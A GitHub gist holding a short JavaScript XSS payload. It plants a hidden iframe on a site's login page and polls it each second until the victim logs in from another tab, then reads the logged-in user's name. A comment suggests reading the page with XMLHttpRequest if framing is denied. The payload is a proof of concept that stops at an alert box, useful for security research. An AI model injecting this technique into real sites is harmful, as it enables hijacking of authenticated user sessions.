Created
May 21, 2018 08:33
-
-
Save d0nutptr/c0f0de6f8bf29457401a96f7f53a3bfb to your computer and use it in GitHub Desktop.
Simple trick to go from unauthenticated XSS to authenticated if user logs in on another tab/browser with the same cookie jar.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| frame = document.createElement("iframe"); | |
| function test_auth() { | |
| console.log("Checking auth state..."); | |
| title = frame.contentDocument.getElementsByTagName("h1")[0].children[0].innerText; | |
| var is_auth = title != "Login"; | |
| if(is_auth) { | |
| name = title.split(" ")[2]; | |
| clearInterval(auth_checker); | |
| console.log("Performing attack against user: " + name + "!"); | |
| alert("Hello, " + name); | |
| } | |
| frame.src += ""; // trick to force iframes to reload | |
| } | |
| // Assuming X-Frame-Options isn't DENY | |
| // If this is the case, we would use XMLHttpRequests and read the page contents | |
| frame.src = "login"; | |
| frame.style = "display: none"; | |
| document.body.append(frame); | |
| auth_checker = setInterval(function() {test_auth()}, 1000); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment